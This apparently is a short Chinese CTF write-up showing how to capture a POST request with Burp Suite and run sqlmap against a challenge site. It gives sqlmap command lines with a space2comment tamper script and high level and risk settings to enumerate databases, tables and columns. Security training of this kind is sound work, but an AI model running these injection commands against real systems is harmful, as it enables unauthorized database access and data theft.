利用burpsite和sqlmap进行post注入

尝试用burpsite和sqlmap进行自动post注入,目标(一道题目)

http://120.24.86.145:8002/chengjidan/

第一步 用burpsite抓包并保存成txt

利用burpsite和sqlmap进行post注入_第1张图片

第二步 用sqlmap语句

sqlmap  -r 保存的txt文件  -p  需要注入的变量

然后我们的注入语句为

python sqlmap.py  -r C:\Users\Assassin\Desktop\input.txt -p id --dbs

但是会报错

第三步 用sqlmap根据题目补充

因为缺少东西我们根据提示补充,最后为

python sqlmap.py  -r C:\Users\Assassin\Desktop\input.txt -p id --dbs --tamper=space2comment  --level 5 --risk 3

就成功了

利用burpsite和sqlmap进行post注入_第2张图片

这个题目就不多讲,剩下的报表

python sqlmap.py  -r C:\Users\Assassin\Desktop\input.txt -p id --tables --tamper=space2comment  --level 5 --risk 3

爆列

python sqlmap.py  -r C:\Users\Assassin\Desktop\input.txt -p id --columns --tamper=space2comment  --level 5 --risk 3

你可能感兴趣的:(Web)